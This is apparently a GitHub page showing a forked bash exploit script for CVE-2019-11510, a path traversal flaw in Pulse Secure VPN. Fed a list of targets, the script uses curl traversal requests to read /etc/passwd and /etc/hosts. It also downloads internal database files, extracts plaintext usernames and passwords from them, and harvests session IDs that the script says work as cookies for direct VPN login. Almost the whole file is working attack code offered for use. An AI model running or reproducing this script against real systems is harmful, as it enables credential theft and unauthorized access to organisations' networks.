forked from projectzeroindia/CVE-2019-11510
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2019-11510.sh
100 lines (100 loc) · 4.96 KB
/
CVE-2019-11510.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!/bin/bash
# Usage : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
# If you want to just verify the exploit and download /etc/passwd then use : cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd / bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
# You must have binutils installed, install it by apt-get install binutils
# Release Date : 21/08/2019
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
echo "=================================================================================
___ _ _ ____ ___ _ _
| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
|__/ CVE-2019-11510
================================================================================="
##############################
if [ ! -d "output" ]; then
mkdir "output";
fi
##############################
while test $# -gt 0; do
case "$1" in
-d)
shift
DOM=$1
shift
;;
--only-etc-passwd)
shift
VER="yes"
shift
;;
*)
break
;;
esac
done
##############################
function checkexp {
UR=$1
URL=${UR%/}
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" > c.txt
RE=$(cat c.txt)
if [[ $RE == *"root:x:0:0:root"* ]]; then
echo "$URL ---------------> Vulnerable"
URLDOM=$(echo $URL | sed -e 's|^[^/]*//||' -e 's|/.*$||')
if [ ! -d "output/$URLDOM" ]; then
mkdir "output/$URLDOM";
fi
echo "Writing all files to output/$URLDOM/"
echo Extracting /etc/passwd
mv c.txt output/$URLDOM/etc_passwd
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/etc_passwd
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if [ -z "$VER" ]; then
echo Extracting /etc/hosts
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" > output/$URLDOM/etc_hosts
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/etc_hosts
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb
echo Extracting Usernames and Passwords from /data/runtime/mtmp/lmdb/dataa/data.mdb
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb | strings > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | sed -z 's/\n/pzipzipzi/g' > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | grep "cn=" | cut -d ',' -f1 | cut -d '=' -f2 > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
while read -r line; do
ST=$line"pzipzipzipassword@2pzipzipzi"
if grep -q $ST "output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod"; then
LI="s/.*"$line"pzipzipzipassword@2pzipzipzi//;s/pzipzipzi.*//"
PASW=$(cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod | sed -e $LI)
echo "User : $line | Password : $PASW"
echo "User : $line | Password : $PASW" >> output/$URLDOM/plaintext_user_pass.txt
else
echo "User : $line | Password not found."
fi
done < output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rm output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
echo "Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn"
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb
cat output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb | strings | grep randomVal | cut -b 10- | sort -u > output/$URLDOM/sessionids.txt
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/sessionids.txt
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fi
else
rm c.txt
echo "$URL ---------------> Not Vulnerable"
fi
}
##############################
if [ -z "$DOM" ]; then
while read x
do
checkexp $x
done
else
checkexp $DOM
fi